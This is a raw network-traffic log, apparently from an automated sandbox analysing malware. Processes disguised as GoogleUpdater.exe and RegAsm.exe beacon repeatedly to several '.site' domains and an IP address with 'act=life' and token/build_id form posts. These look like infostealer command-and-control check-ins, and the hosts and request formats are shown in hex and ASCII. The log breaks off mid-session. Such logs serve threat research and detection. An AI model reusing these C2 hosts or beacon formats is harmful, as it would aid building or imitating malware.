                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          49192.168.2.658570172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:00 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:01 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:01 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:44:01 UTC605INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:01 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9IEVpIa%2FhhqyGQDulpeXVbeIL9JQ7PzarepHSA5mnLboe5mg1dKaUzTnu6YQQ4Q%2BMD5TNj4HUgKC5Ckh75eMzXw5yFVkLutu79BTxjdHQqWIIhsSRcc1sNxzEJpUoa3keA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c80a7bc7c472-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          50192.168.2.65857149.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:01 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 499
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:01 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------KJKJJEGIDBGIDGCBAFHCCont
                                                                                                                                                                                                                                          2024-10-02 12:44:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:01 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          51192.168.2.658573172.67.208.1414432496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:02 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: questionsmw.store
                                                                                                                                                                                                                                          2024-10-02 12:44:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:03 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:03 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=3vshahrd7j9l0hmb1kpb75201q; expires=Sun, 26 Jan 2025 06:30:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jq6qW0YFoAkK3zLvIeNBrTXtmDiLj6%2Fk6EFsNsNf1aE%2Bs2pWh%2FYQWnKqcU2vTWhO9wFT0wLZusMu9t5pghiy1WJBjX7YNd%2BuGVLVRdqSATheqpKEOGm421Xr3VnjSSa5EfR8ng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c814ee660f36-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:03 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          52192.168.2.65857449.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:03 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DGDBAKKJKKECGDGCAECA
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 499
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:03 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 41 4b 4b 4a 4b 4b 45 43 47 44 47 43 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 41 4b 4b 4a 4b 4b 45 43 47 44 47 43 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 41 4b 4b 4a 4b 4b 45 43 47 44 47 43 41 45 43 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------DGDBAKKJKKECGDGCAECAContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------DGDBAKKJKKECGDGCAECAContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------DGDBAKKJKKECGDGCAECACont
                                                                                                                                                                                                                                          2024-10-02 12:44:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:04 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          53192.168.2.658575188.114.97.34432496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:03 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: soldiefieop.site
                                                                                                                                                                                                                                          2024-10-02 12:44:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:04 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:04 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=45ptcvv1ujn9k63119s1smu1s1; expires=Sun, 26 Jan 2025 06:30:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ozerZOKX%2Bce6Mao3xlN03znw%2FgCsAl10leNtk4Mxas3C5g3UpDHq0xiYy8K7L9m%2FGSCIjgrmtGu%2FC5wBy%2F6audl0WWOuM6S76Pem%2B%2B%2FqElebeXJByZwBVPUa9U1U5gFS0iR6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c81bcb0317b1-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:04 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          54192.168.2.658576104.21.56.1504432496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:04 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: abnomalrkmu.site
                                                                                                                                                                                                                                          2024-10-02 12:44:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:05 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:05 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=nvv2i3i6098i8g7oqt4bpikh3s; expires=Sun, 26 Jan 2025 06:30:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oiqMyKbVYxvUqkzzCr%2FYo%2BZnw7ykYHX2qBgEZv68sXgBpr9WIhEyiYR20fPJbF6Z7Wfuh6rUvaAfiChrzHc%2Bfpsb7z4Aje2fm0AYi9NMj3B8ImwnPkrtq9zuL%2Bh2dL7M%2B1Rz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c822ff9dc463-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:05 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          55192.168.2.658577172.67.184.1964432496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:06 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: treatynreit.site
                                                                                                                                                                                                                                          2024-10-02 12:44:06 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:06 UTC768INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:06 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=46875eeh811ne81ro80bm94j23; expires=Sun, 26 Jan 2025 06:30:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uCJphj56%2F97i%2Ft3QRZVPvEQdarGdeIQkUZ1lBTQfLKye9St3CnvvkBtep7KVBCOp60SCge8NN6sZQABVGCs994JDJURqky5nRrqosn%2F5mpUsj7EG%2FlqTOjRuGfDoKvbNynIq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c82b0b3d7290-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:06 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          56192.168.2.65857849.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:06 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DGCAAAFCBFBAKFHJDBKJ
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 499
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:06 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------DGCAAAFCBFBAKFHJDBKJCont
                                                                                                                                                                                                                                          2024-10-02 12:44:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:07 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          57192.168.2.658579104.21.18.1934432496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:08 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: snarlypagowo.site
                                                                                                                                                                                                                                          2024-10-02 12:44:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:08 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:08 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=p6rolqf78hi4vknqndhpeuhmcf; expires=Sun, 26 Jan 2025 06:30:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=meT5OZAn3V%2Bv3OM5hk6fizANsR3RvfBENvxzCT5IPJCndBGXswMh%2FkOUXgikPDkkFPenLeORxVljkIdjoSt4Yx1TXnRAATUH5PXeHJK8%2Byh%2BvCvGgW5T4AvSsEzZwVfb7hMlfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8371f904234-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:08 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          58192.168.2.65858149.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:08 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:08 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------EGCBFIEHIEGCAAAKKKKECont
                                                                                                                                                                                                                                          2024-10-02 12:44:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:09 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          59192.168.2.658582172.67.195.674432496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:09 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: mysterisop.site
                                                                                                                                                                                                                                          2024-10-02 12:44:09 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:09 UTC772INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:09 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=3tafq2c57n99hrte6qablpiqau; expires=Sun, 26 Jan 2025 06:30:48 GMT; Max-Age=9999999; path=/
